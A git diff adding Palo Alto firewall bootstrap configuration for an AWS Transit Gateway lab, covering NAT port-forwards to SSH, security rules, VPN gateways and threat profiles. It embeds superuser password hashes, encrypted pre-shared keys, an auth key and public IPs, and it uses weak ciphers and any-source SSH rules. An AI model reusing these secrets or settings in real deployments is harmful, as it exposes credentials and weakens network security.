+                  <service>tcp-1002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.2.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-1">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.1.45</member>
+                  </destination>
+                  <service>tcp-2001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.1.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-2">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.1.45</member>
+                  </destination>
+                  <service>tcp-2002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.2.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="EW">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>10.0.0.0/8</member>
+                  </source>
+                  <destination>
+                    <member>10.0.0.0/8</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+              </rules>
+            </nat>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default">
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="interzone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+          <profiles>
+            <vulnerability>
+              <entry name="strict-1">
+                <rules>
+                  <entry name="simple-client-critical">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-high">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-informational">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-client-low">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-critical">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-high">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-informational">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="simple-server-low">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+            </vulnerability>
+          </profiles>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files/init-cfg.txt b/aws/TGW-VPC-Mirroring/bootstrap_files/init-cfg.txt
new file mode 100644
index 00000000..8d8c673c
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/bootstrap_files/init-cfg.txt
@@ -0,0 +1,19 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=
+panorama-server=
+panorama-server-2=
+tplname=
+dgname=
+dns-primary=8.8.8.8
+dns-secondary=
+vm-auth-key=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=yes
+dhcp-accept-server-domain=yes
diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files2/authcodes b/aws/TGW-VPC-Mirroring/bootstrap_files2/authcodes
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/bootstrap_files2/authcodes
@@ -0,0 +1 @@
+
diff --git a/aws/TGW-VPC-Mirroring/bootstrap_files2/bootstrap.xml b/aws/TGW-VPC-Mirroring/bootstrap_files2/bootstrap.xml
new file mode 100644
index 00000000..bc3c7efb
--- /dev/null
+++ b/aws/TGW-VPC-Mirroring/bootstrap_files2/bootstrap.xml
@@ -0,0 +1,1087 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="8.1.0">
+  <mgt-config>
+    <users>
+      <entry name="admin">
+        <phash>$1$frspqxow$mYHgnubHD/BO9DTqIU8eP.</phash>
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5</public-key>
+      </entry>
+      <entry name="fwadmin">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$aljwjsru$ZIQ1DURHk0wBmwWTajdFu/</phash>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+          </ethernet>
+          <tunnel>
+            <units/>
+          </tunnel>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <lifetime>
+                  <seconds>28800</seconds>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="aws">
+                <esp>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                  </encryption>
+                </esp>
+                <lifetime>
+                  <seconds>3600</seconds>
+                </lifetime>
+                <dh-group>group2</dh-group>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+          <gateway>
+            <entry name="VPN1">
+              <authentication>
+                <pre-shared-key>
+                  <key>-AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12</key>
+                </pre-shared-key>
+              </authentication>
+              <protocol>
+                <ikev1>
+                  <dpd>
+                    <enable>yes</enable>
+                    <interval>10</interval>
+                    <retry>3</retry>
+                  </dpd>
+                  <ike-crypto-profile>aws</ike-crypto-profile>
+                  <exchange-mode>main</exchange-mode>
+                </ikev1>
+                <ikev2>
+                  <dpd>
+                    <enable>yes</enable>
+                  </dpd>
+                </ikev2>
+              </protocol>
+              <protocol-common>
+                <nat-traversal>
+                  <enable>no</enable>
+                </nat-traversal>
+                <fragmentation>
+                  <enable>no</enable>
+                </fragmentation>
+              </protocol-common>
+              <local-address>
+                <interface>ethernet1/1</interface>
+              </local-address>
+              <peer-address>
+                <ip>34.252.94.101</ip>
+              </peer-address>
+            </entry>
+            <entry name="VPN2">
+              <authentication>
+                <pre-shared-key>
+                  <key>-AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4</key>
+                </pre-shared-key>
+              </authentication>
+              <protocol>
+                <ikev1>
+                  <dpd>
+                    <enable>yes</enable>
+                    <interval>10</interval>
+                    <retry>3</retry>
+                  </dpd>
+                  <ike-crypto-profile>aws</ike-crypto-profile>
+                  <exchange-mode>main</exchange-mode>
+                </ikev1>
+                <ikev2>
+                  <dpd>
+                    <enable>yes</enable>
+                  </dpd>
+                </ikev2>
+              </protocol>
+              <protocol-common>
+                <nat-traversal>
+                  <enable>no</enable>
+                </nat-traversal>
+                <fragmentation>
+                  <enable>no</enable>
+                </fragmentation>
+              </protocol-common>
+              <local-address>
+                <interface>ethernet1/1</interface>
+              </local-address>
+              <peer-address>
+                <ip>52.211.42.95</ip>
+              </peer-address>
+            </entry>
+          </gateway>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="vr">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+                <install-route>no</install-route>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>ethernet1/2</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="default">
+                    <nexthop>
+                      <ip-address>192.168.2.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>0.0.0.0/0</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="spokes">
+                    <nexthop>
+                      <ip-address>192.168.102.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>10.0.0.0/8</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+          </entry>
+        </virtual-router>
+        <tunnel>
+          <ipsec/>
+        </tunnel>
+      </network>
+      <deviceconfig>
+        <system>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>yes</send-client-id>
+              <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+              <accept-dhcp-domain>yes</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <hostname>FW-1</hostname>
+          <panorama-server>18.224.86.63</panorama-server>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>yes</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>yes</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <hostname>FW-1</hostname>
+              <panorama-server>18.224.86.63</panorama-server>
+              <tplname>TP_stack-B</tplname>
+              <dgname>DG</dgname>
+              <dns-primary>8.8.8.8</dns-primary>
+              <vm-auth-key>999663166453480</vm-auth-key>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="untrust">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="trust">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service>
+            <entry name="tcp-1001">
+              <protocol>
+                <tcp>
+                  <port>1001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2001">
+              <protocol>
+                <tcp>
+                  <port>2001</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-2002">
+              <protocol>
+                <tcp>
+                  <port>2002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+            <entry name="tcp-1002">
+              <protocol>
+                <tcp>
+                  <port>1002</port>
+                  <override>
+                    <no/>
+                  </override>
+                </tcp>
+              </protocol>
+            </entry>
+          </service>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="Allow SSH">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>tcp-1001</member>
+                    <member>tcp-1002</member>
+                    <member>tcp-2001</member>
+                    <member>tcp-2002</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="EW">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                  <rule-type>intrazone</rule-type>
+                  <profile-setting>
+                    <profiles>
+                      <url-filtering>
+                        <member>default</member>
+                      </url-filtering>
+                      <file-blocking>
+                        <member>strict file blocking</member>
+                      </file-blocking>
+                      <virus>
+                        <member>default</member>
+                      </virus>
+                      <spyware>
+                        <member>strict</member>
+                      </spyware>
+                      <vulnerability>
+                        <member>strict-1</member>
+                      </vulnerability>
+                      <wildfire-analysis>
+                        <member>default</member>
+                      </wildfire-analysis>
+                    </profiles>
+                  </profile-setting>
+                </entry>
+                <entry name="Allow Outbound">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                </entry>
+              </rules>
+            </security>
+            <nat>
+              <rules>
+                <entry name="NAT_OUT">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/1</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-1">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.2.45</member>
+                  </destination>
+                  <service>tcp-1001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.1.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE1-2">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.2.45</member>
+                  </destination>
+                  <service>tcp-1002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.1.2.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-1">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.2.45</member>
+                  </destination>
+                  <service>tcp-2001</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.1.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="NAT_IN_SPOKE2-2">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>untrust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>192.168.2.45</member>
+                  </destination>
+                  <service>tcp-2002</service>
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <destination-translation>
+                    <translated-port>22</translated-port>
+                    <translated-address>10.2.2.45</translated-address>
+                  </destination-translation>
+                </entry>
+                <entry name="EW">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>10.0.0.0/8</member>
+                  </source>
+                  <destination>
+                    <member>10.0.0.0/8</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+              </rules>
+            </nat>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default">
+                  <action>allow</action>
+                  <log-start>no</log-start>
